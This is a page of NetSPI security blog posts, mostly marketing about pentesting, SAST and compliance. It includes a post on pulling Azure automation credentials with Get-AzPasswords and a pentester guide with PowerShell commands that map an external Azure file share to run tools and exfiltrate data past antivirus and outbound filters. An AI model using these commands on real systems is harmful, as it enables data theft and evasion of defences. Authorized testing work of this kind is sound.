Back

Get-AzPasswords: Encrypting Automation Password Data

Get-AzPasswords is a function within the MicroBurst toolkit that’s used to get passwords from Azure subscriptions using the Az PowerShell modules. As part of this, the function supports gathering passwords and certificates that are attached to automation accounts.

These credentials can be stored in a few different ways:

  • Credentials – Username/Password combinations
  • Connections – Service Principal accounts that you can assume the identity of
  • Certificates – Certs that can be used in the runbooks

If you have the ability to write and run runbooks in an automation account, each of these credentials can be retrieved in a usable format (cleartext or files). All of the stored automation account credentials require runbooks to retrieve, and we really only have one easy option to return the credentials to Get-AzPasswords: print the credentials to the runbook output as part of the extraction script.

The Problem

The primary issue with writing these credentials to the runbook job output is the availability of those credentials to anyone that has rights to read the job output.

Ctcreds

By exporting credentials through the job output, an attacker could unintentionally expose automation account credentials to lesser privileged users, resulting in an opportunity for privilege escalation. As responsible pen testers, we don’t want to leave an environment more vulnerable than it was when we started testing, so outputting the credentials to the output logs in cleartext is not acceptable.

The Solution

To work around this issue, we’ve implemented a certificate-based encryption scheme in the Get-AzPasswords function to encrypt any credentials in the log output.

The automation account portion of the Get-AzPasswords function now uses the following process:

  1. Create a new self-signed certificate (microburst) on the system that is running the function
  2. Export the public certificate to a local file
  3. Encode the certificate file into a base64 string to use in the automation runbook
  4. Decode the base64 bytes to a cer file and import the certificate in the automation account
  5. Use the certificate to encrypt (Protect-CmsMessage) the credential data before it’s written to the output
  6. Decrypt (Unprotect-CmsMessage) the output when it’s retrieved on the testing system
  7. Remove the self-signed cert and remove the local file from the testing system

This process protects the credentials in the logs and in transit. Since each certificate is generated at runtime, there’s less concern of someone decrypting the credential data from the logs after the fact.

The Results

Those same credentials from above will now look like this in the output logs:

Enccreds

On the Get-AzPasswords side of this, you won’t see any difference from previous versions. Any credentials gathered from automation accounts will still be available in cleartext in the script output, but now the credentials will be protected in the output logs.

For anyone making use of Get-Azpasswords in MicroBurst, make sure that you grab the latest version from NetSPI’s GitHub – https://github.com/NetSPI/MicroBurst

Back

Four Must-Have Elements of an Always-On Cyber Security Program

Let’s face it. The chefs in our lives were right when preaching the “clean as you go” philosophy while cooking. Keeping counters and utensils washed and put back in place helps thwart the influx of bacteria and spread of cross contamination that could make us sick. Shouldn’t that same philosophy apply to cyber security, too? Foregoing a “clean as you go” program and conducting a penetration test just once each year may check a compliance box, but ultimately prove to be unsuccessful when it comes to protecting your network and assets from the potential “bacteria” that can enter at any time.

Systems and applications in any organization become alarmingly vulnerable if monitored under a one-and-done scenario. An ongoing and continuous vulnerability management program or penetration testing program is an important guard against the potential threat to your technology assets that hackers pose nearly every second of the day. In fact, a University of Maryland study says that hackers attack every 39 seconds (on average 2,244 times a day). Think of how vulnerable your technology assets are in this environment if only penetration tested once a year.

As an aid to help put structure around a continuous penetration testing program, here are four core considerations that should be a key part of an always-on security program.

1. Prevent Breaches with an ‘Always On’ Testing Mentality

There’s no doubt about it: attack surfaces grow and evolve around the clock. With network configurations, new tools and applications, and third-party integrations coming online constantly, an atmosphere is created that opens the possibility of unidentified security gaps. This white paper points to the fact that cyber-attacks can affect your business and are almost as prevalent as natural disasters and extreme weather events. And we know from our own NetSPI research that nearly 70 percent of CISO security leaders are concerned about network vulnerabilities after implementing new security tools.

And those CISOs’ concerns are valid: take the recent announcement from the U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA). CISA published security advice for organizations that may have rushed out Office 365 deployments to support remote working during the coronavirus pandemic. A ZDNet article says that CISA warns it continues to see organizations that have failed to implement security best practices for their Office 365 implementation. CISA is concerned that hurried deployments may have led to important security configuration oversights that could be exploited by attackers. With continuous penetration testing in place, security leaders can identify high risk vulnerabilities in real-time and close those security gaps faster.

2. Automation Is a Tool; Human Logic Is Critical

Good pentesters use automated scanning tools (ideally from many different sources) and run frequent vulnerability discovery and assessment scans in the overall pentesting process. Vulnerability scanning is generally considered an addition to manual, deep-dive pentests conducted by an ethical hacker. Manual pentesting leverages the findings from automated vulnerability and risk assessment scanning tools to pick critical targets for experienced human pentesters to: 1) verify as high-fidelity rather than chasing false-positives, and then 2) to consider exploiting as possible incremental steps in an effort to eventually gain privileged access somewhere important on the network.

Purely automated tools and highly automated testing activities cannot adequately test the business logic baked into an application. While some tools claim to perform complete testing, no automated technology solution on the market today can perform true business logic testing. The process requires the human element that goes well beyond the capabilities of even the most sophisticated automated tools.

3. Penetration Testing Reports Don’t Have to Be Mundane

We can all agree that there isn’t much enjoyment in reading pages and pages of pentesting data presented in static excel or PDF documents. Now picture what the paperwork for a once-a-year penetration testing report. Gulp! Much like many of us consume the daily news headlines, so too should CISOs view the daily “headlines” of their vulnerability management programming through the display of live pentest report results.

Under this scenario, less time is spent analyzing penetration testing report data, opening valuable time to give to the important work of remediation. Insist on the following pentest report deliverables in your penetration testing program:

  1. Actionable, consumable discovery results to automatically correlate and normalize all of the data collected from multiple open source and proprietary tools.
  2. High quality documentation and reports related to all work delivered, including step-by-step screen-capture details and tester commentary for every successful manual attack.

4. Stay Ahead of the Attacks Through Remediation

To stay ahead of the every 39-second hacks every day, it’s important to enable fast and continuous remediation efforts to keep a threat actor at bay. This goes hand in hand with testing, analyzing, and reporting: if you’re not continuously testing for vulnerabilities, it’s highly probable that the issues remain unresolved. Layer in these remediation best practices into your pentesting program:

  1. Industry standard and expert specific mitigation recommendations for all identified vulnerabilities.
  2. Traceability and archiving of all of the work done to make each subsequent round of testing for your organization more efficient and effective.

Factoring these considerations—always on testing, manual testing, real-time reporting, and remediation—into the planning and design of penetration testing programs will significantly minimize the risk of damage or disruption that could occur in an organization, and dramatically boost the security of your cyber assets.

Back

NetSPI Brings Scale, Agility, and Speed to Static Application Security Testing and Secure Code Review

The new services are designed to identify application security vulnerabilities earlier in the software development life cycle.

Minneapolis, Minnesota  – To mitigate possible security vulnerabilities early in the fast-paced software development life cycle process, today NetSPI, the leader in enterprise security testing and vulnerability management, launched Static Application Security Testing (SAST) and Secure Code Review (SCR) services to aid application and software development teams in establishing a more strategic approach to building secure applications. Key to NetSPI’s multi-level secure code review services involving SAST and SCR is a thorough inspection of source and compiled code to ensure security risks are eliminated before software is deployed to production, at which time the cost of remediation could increase exponentially.

“With Continuous Integration/Continuous Deployment more and more becoming the backbone of the modern DevOps environment, it’s more important than ever to detect and address vulnerabilities through Static Application Security Testing and Source Code Review processes, a service that is complementary to an organization’s penetration testing efforts,” said Nabil Hannan, managing director at NetSPI. “Both testing functions enable more comprehensive vulnerability detection and, in many cases, identify vulnerabilities that are not possible to discover during dynamic testing and analysis.”

NetSPI’s SAST and SCR services are offered in various engagement structures giving application and software development teams options to leverage the appropriate level of testing depth to detect, validate, and resolve security issues based on the business criticality and risk profile of their applications. The services are also a solution to adhere to application development compliance standards, including PCI DSS and HIPAA. NetSPI’s SAST and SCR offerings include:

  • Static Application Security Testing (SAST)—A static analysis performed with a combination of commercial, open source, and proprietary SAST tools, resulting in an assessment report from NetSPI that describes found vulnerabilities and actionable remediation guidance. Additionally, NetSPI offers a streamlined, more economical SAST service which focuses only on testing around the Open Web Application Security Project® (OWASP) Top 10 vulnerabilities.
  • Static Application Security Testing (SAST): Triaging—As an augmentation to an organization’s internal use of SAST tools in Application Security Programs, NetSPI offers triage services. By analyzing the data and assigning degrees of urgency on behalf of the security teams, NetSPI can validate the exploitability of vulnerabilities to remove any false positive findings, allowing development teams the time to focus exclusively on remediation.
  • Secure Code Review (SCR)—Building off the SAST offerings, NetSPI’s SCR offering employs cyber security experts to review underlying frameworks and libraries that are being leveraged to build the application. From there, manual testers identify vulnerabilities that automated scanners cannot detect, such as complex injection attacks, insecure error handling as well as authentication and authorization issues. Additionally, NetSPI offers a streamlined, more economical SCR service which focuses only on reporting around the Open Web Application Security Project® (OWASP) Top 10 vulnerabilities.

Unique to NetSPI is its instructor-led training program around secure coding and remediation for development teams, made available to clients after completion of Static Application Security Testing (SAST) or Secure Code Review (SCR) engagements. Available for up to a class size of 20, NetSPI’s one-day training details the top five categories of vulnerabilities identified in the SAST or SCR engagement and provides insights specific to that organization as well as remediation or mitigation techniques.

“We’ve seen a movement to the left, in terms of prioritizing SCR earlier in the SDLC process as Application Security Programs have evolved,” said Hannan. “We support this strategic approach to security as it is critical to identify and remediate vulnerabilities, and in some cases even prevent them, during the software development phase.”

Learn more about Secure Code Review (SCR) and Static Application Security Testing (SAST) from NetSPI online at netspi.com/security-testing/secure-code-review/ or email heather.rubash@netspi.com to schedule an introductory call with Nabil Hannan, Managing Director at NetSPI.

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on FacebookTwitter, and LinkedIn.

Contact:
Tori Norris
tori@maccabee.com
612-294-3100

Back

Cloud Security: What is it Really, Driving Forces Behind the Transition, and How to Get Started

In a recent episode of Agent of Influence, I talked with Mike Rothman, President of DisruptOps. Mike is a 25-year security veteran, specializing in the sexy aspects of security, such as protecting networks, protecting endpoints, security management, compliance, and helping clients navigate a secure evolution in their path to full cloud adoption. In addition to his role at DisruptOps, Mike is Analyst & President of Securosis. I wanted to share some of his insights in a blog post, but you can also listen to our interview here, on Spotify, Apple Music, or wherever you listen to podcasts.

The Evolving Perception of the Cyber Security Industry

Mike shared the evolution of the cyber security industry from his mom’s perspective – twenty years ago, his mom had no idea what he did – “something with computers.” Today, though, as cyber security and data breaches have made headline news, he can point to that as being what he does – helping companies prevent similar breaches.

Cyber security has become much more visible and has entered the common vernacular. A lot of people used to complain that nobody takes the industry seriously, nobody cares about what we’re doing, and they marginalize everything that we’re talking about. But that has really flipped, because now nobody’s marginalizing anything about security. We have to show up in front of the board and talk about why we’re not keeping pace with the attackers and why we’re not protecting customer data to the degree that we need to. Security has become extremely visible in recent years.

To show this evolution of the industry, Mike noted he’s been to 23 out of last 24 RSA conferences, but when he first started going to the show, it was in a hotel on top of Nob Hill in San Francisco, and there were about 500 people in attendance, most of whom were very technical. Now the conference has become a huge staple of the industry with 35,000-40,000 people attending each year. (Read our key takeaways from this year’s RSA Conference.)

As many guests on the Agent of Influence podcast have noted, the security industry is always evolving; there’s always a new challenge or a new type of methodology that’s being adopted. However, at the same time, there are also a lot of parallels of things that don’t change. For example, a lot of the new vulnerabilities and things that are being identified today are ultimately still the same type of vulnerabilities we’ve been finding for the longest time – there’s still injection attacks, they just might be a different type of injection attack. I personally enjoy looking at things that are recurring and are the same, but just look and feel different in the security space, which makes it interesting.

What Does Cloud Security Really Mean?

Mike started to specialize in cloud security because he says he just got lucky. A friend of his, Jim Reavis founded the Cloud Security Alliance and wanted to offer a certification in cloud security, but he had no way to train people so they could obtain the certification. Jim approached Mike and Rich Mogull to see if they could build the training curriculum for him. As Mike and Rich considered this offer, they realized they A) knew nothing about cloud and B) knew nothing about training!

That was 10 years ago, and as they say… the rest is history. Mike and Rich have been teaching cloud security for the past 10 years, including at the Black Hat Conference for the past five years and advising large customers about how to move their traditional data center operations into the cloud while protecting customer data and taking advantage of a number of the unique characteristics of the cloud. They’ve also founded a company called DisruptOps, which originated from research Mike did with Securosis that they spun out into a separate company to do cloud security automation and cloud security operations.

As Mike says, 10 years ago, nobody really knew what the cloud was, but over time, people started to realize that with the cloud, you get a lot more agility and a lot more flexibility in terms of how you can provision, and both scale up and contract your infrastructure, giving you the ability to do things that you could never do in your own data center. But as with most things that have tremendous upside, there’s also a downside. When you start to program your infrastructure, you end up having a lot of application code that’s representative of your infrastructure, and as we all know – defects happen.

One of the core essential characteristics of the cloud is broad network access, which means you need to be able to access these resources from wherever you are. But, if you screw up an access control policy, everybody can get to your resources, and that’s how a lot of cloud breaches happen today – somebody screws up an access control policy to a storage bucket that is somewhere within a cloud provider.

Data Security and the Cloud

DisruptOps’ aim is to get cyber security leaders and organizations to think about how they can start using architecture as the security control as we move forward. By that he means, you can build an application stack that totally isolates your data layer from your compute layer from your presentation.

These are things you can’t do in your data center because of lateral movement. Once you compromise one thing in the data center, in a lot of cases, you’ve compromised everything in the data center. However, in the cloud, if you do the right thing from an isolation standpoint and an account boundary standpoint, you don’t have those same issues.

Mike encourages people to think more expansively about what things like a programmable infrastructure, isolation by definition, and default deny on all of your access policies for things that you put into the cloud would allow you to do. A lot of these constructs are kind of foreign to people who grew up in data center land. You really must think differently if you want to set things up optimally for the cloud, as opposed to just retrofitting what you’ve been doing for many years to fit the cloud.

Driving Forces Behind Moving from Traditional Data Centers to the Cloud

  1. Speed – Back in the day, it would take three to four weeks to get a new server ordered, shipped, set up in the rack, installed with an operating system, etc. Today, if you have your AWS free tier application, you can have a new server using almost any operating system in one minute. So, in one minute, you have unbounded compute, unbounded storage, and could set up a Class B IP network with one API call. This is just not possible in the data center. So there’s obviously a huge speed aspect of being able to do things and provision new things in the cloud quickly.
  2. Cost – Depending on how you do it, you can actually save a lot of money because you’re not using the resources that you had to build out in order to satisfy your peak usage; you can just expand your infrastructure as you need to and contract it when you’re not using those resources. If you’re able to auto scale and scale up and scale down and you build things using microservices and a lot of platform services that you don’t have to build and run all the time in your environment, you can really build a much more cost effective environment in order to run a lot of your technology operations.
    However, Mike said, if you do it wrong, which is taking stuff you already paid for and depreciated in your data center and move it into the cloud, that becomes a fiasco. If you’re not ready to move to the cloud, you end up paying by the minute for resources that you’ve already paid for and depreciated.
  3. Agility – If you have an attack in one of your technology stacks, you just move it out, quarantine it, build a new one, and move your sessions over there. Unless you want to have totally replicable data centers, you can’t do this in a data center.

There are a lot of architectural, agility, cost, global capabilities, elasticity to scale up and down, and other reasons to take advantage of the capabilities of the cloud.

Resources to Get Started in the Cloud

Mike recommended the below resources and tools for people looking to learn more about the cloud:

  1. Read The Phoenix Project by Gene Kim, which Mike considers the manifesto of DevOps. Regardless of whether your organization is in the cloud or moving to the cloud, we’re undergoing a cultural transformation on the part of IT that looks a lot like DevOps. Some organizations will embrace the cloud in some ways, and other organizations will embrace it in others. The Phoenix Project will give you an idea in the form of a parable about what is possible. For example, what is a broken environment and how can you embrace some of these concepts and fix your environment? This gives you context for where things are going and what the optimal state looks like over time.
  2. Go to aws.amazon.com and sign up for an account in their free tier for a year and start playing around with it by setting up servers and networks, peering between things, sending data, accessing things via the API, logging into the console, and doing things like setting up identity access management policies on those resources. Playing around like this will allow you to get a feel for the granularity of what you can do in the cloud and how it’s different from how you manage your on-prem resources. Without having a basic understanding of how the most fundamental things work in the cloud, moving to the cloud will be really challenging. It is hard to understand how you need to change your security practice to embrace the cloud when you don’t know what the cloud is.
  3. Mike also plugged their basic cloud training courses which give both hands on capabilities, as well as background to be able to pass the Certificate of Cloud Security Knowledge certification. You’ll be able to both talk the language of cloud and play around with Cloud.

To listen to the full podcast, click here, or you can find Agent of Influence on Spotify, Apple Music, or wherever you listen to podcasts.

Back

Azure File Shares for Pentesters

For many years, pentester-hosted SMB shares have been a common technology to use during internal penetration tests for getting tools over to, and data off of, target systems. The process is simple: share a folder from your testing system, execute a “net use z: testingboxtools” from your target, and run your tools from the share.

For a long time, this could be used to evade host-based protection software. While this is all based on anecdotal evidence… I believe that this was mainly due to the defensive software being cautious with network shares. If AV detects a payload on a shared drive (“Finance”), and quarantines the whole share, that could impact multiple users on the network.

As we’ve all continued to migrate up to the cloud, we’re finding that SMB shares can still be used for testing, and can be augmented using cloud services. As I previously mention on the NetSPI blog, Azure services can be a handy way to bypass outbound domain filters/restrictions during assessments. Microsoft-hosted Azure file shares can be used, just like the previously mentioned on-prem SMB shares, to run tools and exfiltrate data.

Setting Up Azure File Shares

Using Azure storage accounts, it’s simple to set up a file share service. Create a new account in your subscription, or navigate to the Storage Account that you want to use for your testing and click the “+ File Share” tab to create a new file share.

For both the file share and the storage account name, I would recommend using names that attempt to look legitimate. Ultimately the share path may end up in log files, so something along the lines of hackertools.file.core.windows.netpayloads may be a bad choice.

Connecting to Shares

After setting up the share, mapping the drive from a Windows host is pretty simple. You can just copy the PowerShell code directly from the Azure Portal.

Or you can simplify things, and you can remove the connectTestResult commands from the above command:

cmd.exe /C "cmdkey /add:`"STORAGE_ACCT_NAME.file.core.windows.net`" /user:`"AzureSTORAGE_ACCT_NAME`" /pass:`"STORAGE_ACCT_KEY`""
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\STORAGE_ACCT_NAME.file.core.windows.net\tools" | out-null

Where STORAGE_ACCT_NAME is the name of your storage account, and STORAGE_ACCT_KEY is the key used for mapping shares (found under “Access Keys” in the Storage Account menu).

I’ve found that the connection test code will frequently fail, even if you can map the drive. So there’s not a huge benefit in keeping that connection test in the script.

Now that we have our drive mapped, you can run your tools from the drive. Your mileage may vary for different executables, but I’ve recently had luck using this technique as a way of getting tools onto, and data out of, a cloud-hosted system that I had access to.

Removing Shares

As for clean up, we will want to remove the added drive when we are done, and remove any cmdkeys from our target system.

Remove-PSDrive -Name Z
cmd.exe /C "cmdkey /delete:`"STORAGE_ACCT_NAME.file.core.windows.net`""

It also wouldn’t hurt to cycle those keys on our end to prevent the old ones from being used again. This can be done using the blue refresh button from the “Access Keys” section in the portal.

To make this a little more portable for a cloud environment, where we may be executing PowerShell on VMs through cloud functions, we can just do everything in one script:

cmd.exe /C "cmdkey /add:`" STORAGE_ACCT_NAME.file.core.windows.net`" /user:`"Azure STORAGE_ACCT_NAME`" /pass:`" STORAGE_ACCT_KEY`""
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\STORAGE_ACCT_NAME.file.core.windows.net\tools" | out-null

# Insert Your Commands Here

Remove-PSDrive -Name Z
cmd.exe /C "cmdkey /delete:`"STORAGE_ACCT_NAME.file.core.windows.net`""

*You may need to change the mapped PS Drive letter, if it’s already in use.

I was recently able to use this in an AWS environment with the Run Command feature in the AWS Systems Manager service, but this could work anywhere that you have command execution on a host, and want to stay off of the local disk.

Conclusion

The one big caveat for this methodology is the availability of outbound SMB connections. While you may assume that most networks would disallow outbound SMB to the internet, it’s actually pretty rare for us to see outbound restrictions on SMB traffic from cloud provider (AWS, Azure, etc.) networks. Most default cloud network policies allow all outbound ports and protocols to all destinations. So this may get more mileage during your assessments against cloud hosts, but don’t be surprised if you can use Azure file shares from an internal network.

Back

Focus on Context to Improve Your Incident Response Plan

$8.19 million. That’s the average loss U.S. organizations face each year due to the damages of cyber security attacks, according to a Ponemon Institute study. More worrisome is the fact that the average time it took to identify and contain a breach was 279 days, a number that is growing. Cyber security and IT teams continue to feel unprepared in the event of a breach and struggle to keep pace with the ever-evolving threat landscape. Maintaining an always-on mentality, prioritizing vulnerability testing to faster remediation, and understanding the implications of an alert in an organization’s asset management platform are key to staying ahead. But in the long-term, also having a deep contextual knowledge of business operations as a whole should be considered fundamental to preparing and defending against escalating threats.

In 1989, Robert Morris created what has been widely acknowledged as the first computer threat, which spread so aggressively and quickly that it succeeded in closing down much of the internet. While the Morris Worm was the impetus to putting in place coordinated systems and incident teams to deal with cyberattacks, it wasn’t until the Target breach in 2013, in which information from 40 million credit and debit cards were stolen, that leaders in corporations began to fully understand that all levels of an organization must understand the potential threat of breaches and that ad hoc support of cyber security initiatives was no longer sufficient. Rather, all-encompassing programs of prevention, monitoring, and remediation must be in place.

Bringing Context to Incident Response

Incident response teams today must have full knowledge of the ecosystem and what systems need protecting (and the data residing within) to have a more comprehensive approach to protecting their organizations from cyber security threats. They can do so by adding context to incident response. Currently, if there is a threat event that occurs, the analyst has to synthesize the environment that they’re trying to defend before action can take place. But if they don’t have the contextual knowledge of their organization—what application supports what infrastructure, which impacts what business process and value stream—then that incident responder is already behind.

Security teams should understand what they are reacting to, how to recreate the view and immediately understand the ecosystem they are trying to protect so they can act on it right away rather than reverse engineer the situation, which it may be too late to do anyway. In that case, the threat actor may be able to move faster than the incident responder. Easily said, but as apps are starting to be decomposed, the ecosystem is becoming even more distributed, making the context even harder for incident response managers to understand. With more and more application security and applications offered in containers, in the cloud (or cloud native), or offered serverless and through functions-as-a service-platforms, incident responders are now in a position in which they need to understand the contextual challenge of the threats. It is critical that incident responders understand what type of threat they are responding to and what it is they are trying to protect in the larger business sense. Helping to create context is going to be an emerging challenge that needs to be addressed by the industry and community in the future.

Creating Better Asset Management Platforms to Improve Incident Response

When creating asset management platforms, I recommend that CISOs work with their team to base that development on context around the business and the technology. When the platform isn’t so rigidly defined in the context of an application, we start to make connections with the infrastructure to the business processes and the value streams. And it is then that you can truly start to be a counselor to senior leadership and articulate the business impact of any given threat. Through contextualization, you’ll immediately know when you have the asset data and the association, and whether it is of lesser importance (and you don’t need to wake up the CEO!). Or vice versa, when there is a high-fidelity threat that is hitting your flagship application that is behind the capabilities of the entire business process. That is when it will warrant executive leadership attention, but now you will be in a position to also provide solutions to remediation.

Some areas I’ve explored while developing asset management platforms revolve around visualization. I’m looking at the integration between logging and monitoring capabilities and the data they generate through asset management tools, but also other solutions like cloud and container monitoring platforms and the telemetry they provide. Then I’m looking at the visualization tools that are out there that can create these views. Picture this asset management platform chronology:

  1. Data comes up through logging and monitoring capability
  2. Incident Responder quickly determines it is a problem
  3. Through the functionality of the asset management platform, the backends stitches together all that data and pulls up a visualization tool that is able to map the internal environment or/cloud environment that shows the team that this alert is associated with a particular container, which is a part of a particular ecosystem/value stream that is talking to these specific databases
  4. Incident Responders quickly react to visual cues, improved through real-time contextual awareness, so they can more quickly appreciate the danger and immediately take on real action to thwart the threat

That is a future state that positions incident responders as a force to be reckoned with against the ever-evolving threat landscape.

Improving Your Standing in Incident Response

In addition to investing in understanding the context of your incident response plans, I offer the following advice to improve incident responders’ professional standing:

  • Become Invaluable as Subject Matter Experts—Understand the ecosystem of your organization, the context in which threats may occur and the consequences on the business values streams so you can quickly synthesize the information to give the broader team – even the C-Suite – insights and counsel.
  • Always Remain Curious, Even Suspicious—Have your radar always on so that, for example, if a new threat comes out, which may or may not even impact your environment but may be within your vertical market, you can preemptively guard against them.
  • Understand the Threat and its Potential Impact—Be readily able to ascertain if there is a concern in your environment through volume metrics (i.e., how much of that problem do we have?) and through risk quantification (i.e., threat W is against X so not a concern, but threat Y is against Z so it is a big concern).

Conclusion

There is real opportunity to improve real-time contextual awareness so incident responders can more quickly appreciate what they have so they can immediately action on it rather than waste time in making inferences about the environment. To be sure, incident response plans are ever evolving, and some plans are undoubtedly better than others. It boils down to whether the incident responders are executing on the plan and have an appropriate contextual appreciation of the environment, the ecosystem, the business value streams and the stakeholders involved to get the right people to the table to best defend against adversaries.

Back

Dark Reading: Pen Testing ROI: How to Communicate the Value of Security Testing

On July 9, 2020, NetSPI Managing Director Nabil Hannan was featured in Dark Reading.

Google “pen testing return on investment (ROI)” and you will find a lot of repetitive advice on how to best communicate the value of a pen-testing engagement. Evaluate the costs of noncompliance penalties, measure the impact of a breach against the cost of a pentest engagement, reduce time to remediation, to name a few. While all of these measurements are important, pen testing provides value beyond compliance and breach prevention, even through a financial lens. Let’s explore the critical steps to successfully define and communicate ROI for security testing.

Read the full article here.

Back

Building a Security Framework in a Compliance-Driven World

Depending on the industry an organization is in, there are a multitude of specific, acronym-heavy rules, regulations, and frameworks which must be adhered to, especially for industries with extremely sensitive and valuable data, including healthcare, banking, and energy. For many years, these compliance-first frameworks – HIPPA for healthcare, PCI-DSS for credit card handling, and NERC-CIP for energy companies, to name a few – were the structure around which IT leaders managed their security programs. To further complicate things, there are multiple compliance-based frameworks that overlap and even others that are specific to the states in which an organization does business, like CCPA. A common example of cyber security compliance? Once a year (typically) organizations are required to have an outside, third party evaluate its programs. Voilà! An organization is secure, right? Not always.

In my opinion, building your security program around a framework for compliance, ensures an organization is compliant, but doesn’t necessarily make it secure. In fact, if you’re simply implementing a security strategy to check a box, it’s likely that your systems are vulnerable to cyber adversaries. While security is foundational in these compliance-based frameworks, historically it was deemphasized for a period of time. But things are changing – specifically, the way we think about security is shifting away from a compliance-first mindset. Big data breaches got the attention of Boards of Directors from a financial (read: fines, lawsuits) and reputational loss standpoint. From a technology standpoint, there’s no longer an inside and outside of the organization and just defending perimeters with firewalls is no longer adequate. And, one more example, with a move away from a waterfall release of applications to a more agile development philosophy, it makes business sense to elevate the frequency of vulnerability assessments, even moving to a continuous, ongoing monitoring of internet-facing attack landscapes to more adequately protect against unauthorized access to an organization’s intellectual property.

Organizations that have a more mature technology footprint are surely interested in doing everything they possibly can to find and fix vulnerabilities. And even in a mature scenario, there’s ample opportunity to put in an action-based framework that ties up to an organization’s controls and security framework. Consider this: the world’s leading research organization, Gartner, found that between 2014-2018 approximately 41 percent of clients had either not selected a framework or had developed their own ad hoc framework. It goes on to show that failure to select any framework and/or build one from scratch can lead to security programs that:

  • Have critical control gaps and therefore don’t address current and emerging threats in line with stakeholder expectations.
  • Place undue burden on technical and security teams.
  • Waste precious funding on security controls that don’t move the needle on the organization’s risk profile.

How can we begin to administer a security-based framework? Quite simply, just begin. It doesn’t have to be perfect from the get-go. Consider it a work in progress. After all, the threat actors, technology assets, and detective controls are constantly changing. Thus, you will need to constantly change and adapt your continuous, always-on security and vulnerability management program. Here are some best practices to help you begin implementing your security-based framework changeover.

  1. Evaluate the landscape: Determine whether there has been a security framework or controls catalog developed for your specific industry sector. The NIST Cybersecurity Framework is a good place to start. But what happens when there is no industry-specific or government-mandated security framework and control catalog? In this case, security capability maturity and team capacity and capability become the key inputs in selecting your security control framework and control catalog. (Source: Gartner)
  2. Engage with organizational leadership outside of technology: Develop a scrum planning team with legal, risk, and front-line business unit representatives to help identify discrete regulatory or legislative obligations that need consideration.
  3. Audit your internal and external environment: Identify the contextual factors that could influence your selection of security framework and control.
  4. Invest in your people: Admit to technology fatigue and that some significant investments aren’t optimized to meet set objectives or are redundant. Instead, invest in a people-first, pentesting team that can approach security from the eyes of an attacker.
  5. Develop a plan based on continuous improvement: Combine manual and automated pentesting to produce real-time, actionable results, allowing security teams to remediate vulnerabilities faster, better understand their security posture, and perform more comprehensive testing throughout the year.

Remember: Just because an organization’s cyber security program is compliant, doesn’t mean it is secure. If an organization approaches its security programs from a security-first mindset, most likely it will comply with the necessary compliance rules and regulations. I see compliance as a subset of security, not the other way around.

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.

X